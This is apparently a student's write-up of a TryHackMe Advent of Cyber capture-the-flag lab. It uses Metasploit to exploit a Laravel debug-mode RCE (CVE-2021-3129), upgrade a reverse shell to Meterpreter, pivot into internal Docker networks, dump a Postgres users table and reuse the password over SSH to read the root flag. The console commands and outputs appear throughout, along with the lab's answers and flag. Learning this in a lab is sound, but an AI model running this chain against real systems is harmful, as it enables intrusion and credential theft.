
# Task#14 - [Day 9] Pivoting Dock the halls

The Story

![an illustration depicting a wreath with ornaments](/tryhackme.com/adventofcyber4/file/847d9741b9d9aac8d9372989f4d93958.png)

Check out Alh4zr3d's video walkthrough for Day 9 [here](https://www.youtube.com/watch?v=mZqNP2fOLlk)!  

**Today's task was created by the Metasploit Team at Rapid7.**

![rapid7](/tryhackme.com/adventofcyber4/file/5289605c92c8f60838a479cba5848cb3.png)

Because of the recent incident, Santa has asked his team to set up a new web application that runs on Docker. It's supposed to be much more secure than the previous one, but better safe than sorry, right? It's up to you, McSkidy, to show Santa that there may be hidden weaknesses before the bad guys find them!  

## A note before you start

>Hey,
>
>This task is a bit more complex than what you have seen so far in the event. We’ve ensured the task content has all the information you need. However, as there are many moving parts to getting it to work, it might prove challenging. Worry not! We have plenty of resources to help you out.
>
>Linked above is a video walkthrough of the challenge, recorded by Alh4zr3d. It includes a thorough explanation, comprehensive instruction, valuable hints, analogies, and a complete guide to answering all the questions. Use it!
>
>If you need more, [visit us on Discord](https://discord.gg/tryhackme)! We have a dedicated channel for Advent of Cyber, with staff on call and a very supportive community to help with all your questions and doubts.*
>
>You got this! See you tomorrow - Elf McSkidy will need your help more than ever.
>
>With love,
>
>The TryHackMe Team

## Learning Objectives

* Using Metasploit modules and Meterpreter to compromise systems
* Network Pivoting
* Post exploitation

## Concepts

### What is Docker?

Docker is a way to package applications, and the associated dependencies into a single unit called an image. This image can then be shared and run as a container, either locally as a developer or remotely on a production server. Santa’s web application and database are running in Docker containers, but only the web application is directly available via an exposed port. A common way to tell if a compromised application is running in a Docker container is to verify the existence of a `/.dockerenv` file at the root directory of the filesystem.

### What is Metasploit?

Metasploit is a powerful penetration testing tool for gaining initial access to systems, performing post-exploitation, and pivoting to other applications and systems. Metasploit is free, open-source software owned by the US-based cybersecurity firm Rapid7.

### What is a Metasploit session?

After successfully exploiting a remote target with a Metasploit module, a session is often opened by default. These sessions are often Command Shells or Meterpreter sessions, which allow for executing commands against the target. It’s also possible to open up other session types in Metasploit, such as SSH or WinRM - which do not require payloads.

The common Metasploit console commands for viewing and manipulating sessions in Metasploit are:

![terminal](images/2022-12-11-19-47-33.png)

### What is Meterpreter?

Meterpreter is an advanced payload that provides interactive access to a compromised system. Meterpreter supports running commands on a remote target, including uploading/downloading files and pivoting.

Meterpreter has multiple useful commands, such as the following:

![terminal](images/2022-12-11-19-48-04.png)

Note that normal command shells do not support complex operations such as pivoting. In Metasploit’s console, you can upgrade the last opened Metasploit session to a Meterpreter session with `sessions -u -1`.

You can identify the opened session types with the `sessions` command. If you are currently interacting with a Meterpreter session, you must first `background` it. In the below example, the two session types are `shell cmd/unix` and `meterpreter x86/linux`:

![terminal](images/2022-12-11-19-48-32.png)

### What is Pivoting?

Once an attacker gains initial entry into a system, the compromised machine can be used to send additional web traffic through - allowing previously inaccessible machines to be reached.

For example - an initial foothold could be gained through a web application running in a docker container or through an exposed port on a Windows machine. This system will become the attack launchpad for other systems in the network.

![Image of initial foothold between a pentester host and a compromised container](/tryhackme.com/adventofcyber4/file/96b6f34691943493b36baed19bd4641a.png)

We can route network traffic through this compromised machine to run network scanning tools such as `nmap` or `arp` to find additional machines and services which were previously inaccessible to the pentester. This concept is called network pivoting.

![Image of pivoting using a compromised container to other endpoints on the network](/tryhackme.com/adventofcyber4/file/81947d7cc301f1505f383089991cd3bc.png)

### Launching The TryHackMe Kali Linux

For this task, you need to be using a Kali machine. TryHackMe host and provide a version of Kali Linux that is controllable in your browser. You can also connect with your own Kali Linux using OpenVPN.
  
You can deploy the TryHackMe Kali Machine by following the steps below:

1. Scroll to the top of the page and press the drop-down arrow on the right of the blue "Start AttackBox" button:

    ![an image illustrating the location of the Kali VM launch button](/tryhackme.com/adventofcyber4/file/04378b544195b1a61acf1fa4d035fd48.png)

2. Select "Use Kali Linux" from the drop-down:

   ![an image illustrating the Kali VM and AttackBox launch buttons](/tryhackme.com/adventofcyber4/file/580097ccb4d83610a881fe94e6cccf46.png)\

3. Now press the "Start Kali" button to deploy the machine:

   ![an image illustrating the Kali VM launch button](/tryhackme.com/adventofcyber4/file/a722607c5328f7ea8b014e9e3a02c669.png)
  
4. The machine will open in a split-screen view:

    ![an image illustrating the Kali VM in split screen view](/tryhackme.com/adventofcyber4/file/fa927cbf9072c8303dbc6a917f3f90a6.png)  
  
### Using Metasploit

If you are using the Web-based Kali machine or your own Kali machine, you can open Metasploit with the following `msfconsole` command:  

![terminal](images/2022-12-11-19-49-36.png)

After msfconsole is opened, there are multiple commands available:

![terminal](images/2022-12-11-19-50-29.png)

After using a Metasploit module, you can view the options, set options, and run the module:

![terminal](images/2022-12-11-19-51-14.png)

You can also directly set options from the `run` command:

Metasploit Console Commands

![terminal](images/2022-12-11-19-52-15.png)

### Using Meterpreter to pivot

Metasploit has an internal routing table that can be modified with the `route` command. This routing table determines where to send network traffic through, for instance, through a Meterpreter session. This way, we are using Meterpreter to pivot: sending traffic through to other machines on the network.

Note that Meterpreter has a separate route command, which is not the same as the top-level Metasploit prompt's route command described below. If you are currently interacting with a Meterpreter session, you must first `background` it.

Examples:

![terminal](images/2022-12-11-19-52-57.png)

### Socks Proxy

A socks proxy is an intermediate server that supports relaying networking traffic between two machines. This tool allows you to implement the technique of pivoting. You can run a socks proxy either locally on a pentester’s machine via Metasploit, or directly on the compromised server. In Metasploit, this can be achieved with the `auxiliary/server/socks_proxy` module:

![terminal](images/2022-12-11-19-54-17.png)

Tools such as `curl` support sending requests through a socks proxy server via the `--proxy` flag:

![terminal](images/2022-12-12-17-35-49.png)

If the tool does not natively support an option for using a socks proxy, ProxyChains can intercept the tool’s request to open new network connections and route the request through a socks proxy instead. For instance, an example with Nmap:

![terminal](images/2022-12-12-17-36-28.png)

### Challenge Walkthrough

After deploying the attached VM, run Nmap against the target:

![terminal](images/2022-12-12-18-15-50.png)

After loading the web application in our browser at <http://MACHINE_IP:80> (use Firefox on the Kali web-Machine) and inspecting the Network tab, we can see that the server responds with an HTTP Set-Cookie header indicating that the server is running Laravel - a common web application development framework:

![Image of the discovered web application. The browser's network developer tools are open and the 'Set-Cookie: laravel_session' HTTP header is highlighted](/tryhackme.com/adventofcyber4/file/657260c9b96783c5d2d193013578c100.png)

The application may be vulnerable to a remote code execution exploit which impacts Laravel applications using debug mode with Laravel versions before 8.4.2, which use ignite as a developer dependency.

We can use Metasploit to verify if the application is vulnerable to this exploit.

Note: be sure to set the HttpClientTimeout=20, or the check may fail. In extreme situations where your connection is really slow/unstable, you may need a value higher than 20 seconds.  

![terminal](images/2022-12-12-17-37-19.png)

**Note: When using TryHackMe's Kali Web-Machine - you should use eth0 as the LHOST value (ATTACKER\_IP), and not the VPN IP shown in the Kali Machine at the top-right corner (which is tun0).**

To find out what IP address you need to use, you can open up a new terminal and enter `ip addr`. The IP address you need will start with *10.x.x.x*. Remember, you will either need to use eth0 or tun0, depending on whether or not you are using the TryHackMe Kali Web-Machine.

 Using ip addr to list the interfaces corresponding IP address in Kali

![terminal](images/2022-12-12-17-44-41.png)

Now that we’ve confirmed the vulnerability, let’s run the module to open a new session:  

Metasploit Console Commands

![terminal](images/2022-12-12-17-45-18.png)

The opened shell will be a basic `cmd/unix/reverse_bash` shell. We can see this by running the background command and viewing the currently active sessions:

Metasploit Console Commands

![terminal](images/2022-12-12-17-45-55.png)

If you are currently in a session - you can run the `background` command to go back to the top-level Metasploit prompt. To upgrade the most recently opened session to Meterpreter, use the `sessions -u -1` command. Metasploit will now show two sessions opened - one for the original shell session and another for the new Meterpreter session:

![terminal](images/2022-12-12-17-47-10.png)

After interacting with the Meterpreter session with `sessions -i -1` and exploring the application, we can see there are database credentials available:

![terminal](images/2022-12-12-17-47-36.png)

We can use Meterpreter to resolve this remote hostname to an IP address that we can use for attacking purposes:

![terminal](images/2022-12-12-17-48-03.png)

As this is an internal IP address, it won’t be possible to send traffic to it directly. We can instead leverage the network pivoting support within msfconsole to reach the inaccessible host. To configure the global routing table in msfconsole, ensure you have run the `background` command from within a Meterpreter session:

![terminal](images/2022-12-12-17-48-33.png)

We can also see, due to the presence of the `/.dockerenv` file, that we are in a docker container. By default, Docker chooses a hard-coded IP to represent the host machine. We will also add that to our routing table for later scanning:

![terminal](images/2022-12-12-18-10-57.png)

We can print the routing table to verify the configuration settings:

![terminal](images/2022-12-12-18-11-43.png)

With the previously discovered database credentials and the routing table configured, we can start to run Metasploit modules that target Postgres. Starting with a schema dump, followed by running queries to select information out of the database:

![terminal](images/2022-12-12-18-12-09.png)

To further pivot through the private network, we can create a socks proxy within Metasploit:

![terminal](images/2022-12-12-18-12-46.png)

This will expose a port on the attacker machine that can be used to run other network tools through, such as `curl` or `proxychains`

![terminal](images/2022-12-12-18-13-27.png)

With the host scanned, we can see that port 22 is open on the host machine. It also is possible that Santa has re-used his password, and it’s possible to SSH into the host machine from the Docker container to grab the flag:

Metasploit Console Commands

![terminal](images/2022-12-12-18-14-05.png)

## Questions

1. Deploy the attached VM, and wait a few minutes. What ports are open? **80**

    ```bash
    root@ip-10-10-44-241:~# nmap -T4 -Pn 10.10.120.126

    Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-18 19:13 GMT
    Nmap scan report for ip-10-10-120-126.eu-west-1.compute.internal (10.10.120.126)
    Host is up (0.0015s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE
    80/tcp open  http
    MAC Address: 02:17:02:00:DA:13 (Unknown)

    Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

    ```

2. What framework is the web application developed with? **laravel**

    ![firefox](images/2022-12-18-11-22-36.png)

3. What CVE is the application vulnerable to? **CVE-2021-3129**

    **Hint:** Use the info command of the chosen Metasploit module (Format: CVE-xxxx-xxxx)

4. What command can be used to upgrade the last opened session to a Meterpreter session? **sessions -u -1**

    ```bash
    msf6 exploit(multi/php/ignition_laravel_debug_rce) > sessions -u -1
    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

    [*] Upgrading session ID: 1
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on 10.10.73.134:4433 
    [*] Sending stage (1017704 bytes) to 10.10.10.189
    [*] Meterpreter session 2 opened (10.10.73.134:4433 -> 10.10.10.189:48812) at 2022-12-18 20:30:03 +0000
    [*] Command stager progress: 100.00% (773/773 bytes)
    ```

5. What file indicates a session has been opened within a Docker container? **/\.dockerenv**

6. What file often contains useful credentials for web applications? **\.env**

7. What database table contains useful credentials? **users**

    **Find Database ip address**

    ```bash
    meterpreter > resolve webservice_database

    Host resolutions
    ================

        Hostname             IP Address
        --------             ----------
        webservice_database  172.28.101.51
    ```

    **Add route for database**

    ```bash
    meterpreter > background
    [*] Backgrounding session 2...
    msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51 -1
    [*] Route added
    msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print

    IPv4 Active Routing Table
    =========================

        Subnet             Netmask            Gateway
        ------             -------            -------
        172.28.101.51      255.255.255.255    Session 2

    [*] There are currently no IPv6 routes defined.

    ```

    **Dump database schema**

    ```bash
    msf6 exploit(multi/php/ignition_laravel_debug_rce) > use auxiliary/scanner/postgres/postgres_schemadump
    msf6 auxiliary(scanner/postgres/postgres_schemadump) > run postgres://postgres:postgres@172.28.101.51/postgres 
    [*] 172.28.101.51:5432 - Found databases: postgres, template1, template0. Ignoring template1, template0.
    [+] Postgres SQL Server Schema 
    Host: 172.28.101.51 
    Port: 5432 
    ====================

    ---
    - DBName: postgres
      Tables:
      - TableName: users_id_seq
        Columns:
        - ColumnName: last_value
          ColumnType: int8
          ColumnLength: '8'
        - ColumnName: log_cnt
          ColumnType: int8
          ColumnLength: '8'
        - ColumnName: is_called
          ColumnType: bool
          ColumnLength: '1'
        - TableName: users
        Columns:
        - ColumnName: id
          ColumnType: int4
          ColumnLength: '4'
        - ColumnName: username
          ColumnType: varchar
          ColumnLength: "-1"
        - ColumnName: password
          ColumnType: varchar
          ColumnLength: "-1"
        - ColumnName: created_at
          ColumnType: timestamp
          ColumnLength: '8'
        - ColumnName: deleted_at
          ColumnType: timestamp
          ColumnLength: '8'
      - TableName: users_pkey
        Columns:
        - ColumnName: id
          ColumnType: int4
          ColumnLength: '4'

    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    ```

8. What is Santa's password? **p4$$w0rd**

    ```bash
    msf6 auxiliary(scanner/postgres/postgres_schemadump) > use auxiliary/admin/postgres/postgres_sql
    msf6 auxiliary(admin/postgres/postgres_sql) > run postgres://postgres:postgres@172.28.101.51/postgres sql='select * from users'
    [*] Running module against 172.28.101.51

    Query Text: 'select * from users'
    =================================

        id  username  password  created_at                  deleted_at
        --  --------  --------  ----------                  ----------
        1   santa     p4$$w0rd  2022-09-13 19:39:51.669279  NIL

    [*] Auxiliary module execution completed
    ```

9. What ports are open on the host machine? **22,80**

    **Start Proxy**

    ```bash
    msf6 auxiliary(server/socks_proxy) > run srvhost=127.0.0.1 srvport=9050 version=4a
    [*] Auxiliary module running as background job 8.
    msf6 auxiliary(server/socks_proxy) > 
    [*] Starting the SOCKS proxy server
    ```

    **Check Proxy**

    ```bash
    ┌──(root㉿kali)-[~]
    └─# curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
    *   Trying 127.0.0.1:9050...
    * SOCKS4 communication to 172.17.0.1:80
    * SOCKS4a request granted.
    * Connected to localhost (127.0.0.1) port 9050 (#0)
    > GET / HTTP/1.1
    > Host: 172.17.0.1
    > User-Agent: curl/7.85.0
    > Accept: */*
    > 
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Date: Sun, 18 Dec 2022 22:01:44 GMT
    < Server: Apache/2.4.54 (Debian)
    < X-Powered-By: PHP/7.4.30
    < Cache-Control: no-cache, private

    <snip>
    ```

    **Use Nmap**

    ```bash
    ┌──(root㉿kali)-[~]
    └─# proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1
    Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-18 22:04 UTC
    Nmap scan report for 172.17.0.1
    Host is up (0.0068s latency).

    PORT     STATE  SERVICE
    22/tcp   open   ssh
    80/tcp   open   http
    443/tcp  closed https
    5432/tcp closed postgresql

    Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
    ```

    **Hint:** List the ports in order.

10. What is the root flag? **THM{47C61A0FA8738BA77308A8A600F88E4B}**

    **Setup SSH**

    ```bash
    msf6 auxiliary(server/socks_proxy) > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > run

    [-] Msf::OptionValidateError The following options failed to validate: RHOSTS
    msf6 auxiliary(scanner/ssh/ssh_login) > run ssh://santa:p4$$w0rd@172.17.0.1

    [*] 172.17.0.1:22 - Starting bruteforce
    [+] 172.17.0.1:22 - Success: 'santa:p4$$w0rd' 'uid=0(root) gid=0(root) groups=0(root) Linux hostname 4.15.0-156-generic #163-Ubuntu SMP Thu Aug 19 23:31:58 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
    [*] SSH session 3 opened (10.10.73.134-10.10.10.189:59318 -> 172.17.0.1:22) at 2022-12-18 22:07:41 +0000
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions

    Active sessions
    ===============

    Id  Name  Type                   Information               Connection
    --  ----  ----                   -----------               ----------
    1         shell cmd/unix                                   10.10.73.134:4444 -> 10.10.10.189:50884 (10.10.
                                                                10.189)
    2         meterpreter x86/linux  www-data @ 172.28.101.50  10.10.73.134:4433 -> 10.10.10.189:48812 (10.10.
                                                                10.189)
    3         shell linux            SSH root @                10.10.73.134-10.10.10.189:59318 -> 172.17.0.1:2
                                                                2 (172.17.0.1)
    ```

    **Connect to SSH Session**

    ```bash
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions 3
    [*] Starting interaction with 3...

    mesg: ttyname failed: Inappropriate ioctl for device
    ls /root
    root.txt
    cat /root/root.txt
    THM{47C61A0FA8738BA77308A8A600F88E4B}
    ```

11. Day 9 is done! You might want to take a well-deserved rest now. If this challenge was right up your alley, though, we think you might enjoy the [Compromising Active Directory](https://tryhackme.com/module/hacking-active-directory) module!
